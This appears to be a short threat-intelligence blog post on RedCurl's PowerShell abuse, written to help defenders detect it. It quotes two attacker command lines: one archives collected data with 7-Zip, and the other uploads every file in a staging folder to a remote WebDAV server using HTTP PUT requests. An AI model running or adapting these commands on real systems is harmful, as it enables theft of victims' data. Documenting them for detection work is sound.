046. RedCurl Abuses PowerShell for Collection and Exfiltration: Detection Opportunities
Hello everyone! Let's look at another curious case of PowerShell abuse. This time adversary used it for data collection and exfiltration.
I took the following examples from eSentire report on RedCurl (we track this activity cluster as Red Wolf).
The first example shows how the adversary uses 7-Zip to archive collected data:
powershell -c "gci .*.exe | foreach {if(($.VersionInfo).InternalName -eq '7za'){$syspack = $.Fullname}};$a1='x';$a2='-aoa';$a3='-p'+$env:ppass2;$a4=$env:util;$a5='-o'+$env:tdir;&$syspack $a1 $a2 $a3 $a4 $a5;"
The second example - collected data exfiltration with PowerShell:
powershell -c "$PSW01 = New-Object -ComObject MSXML2.ServerXMLHTTP;$AFS = New-Object -ComObject ADODB.Stream;$AFS.Open();$AFS.Type = 1;Get-ChildItem .$env:trdir | Where-Object {$.PSIsContainer -eq $false;} | foreach {$AFS.LoadFromFile($.FullName);$AFB = $AFS.Read();$PSW01.Open('PUT', $env:davstr+'/'+$env:davfld+'/'+$_.Name, $False, $env:slog, $env:spass);$PSW01.Send($AFB);};$PSW01.Close;"
PowerShell enables adversaries to solve almost any task, so it's very important to track various procedure examples!
See you tomorrow!
Comments
Post a Comment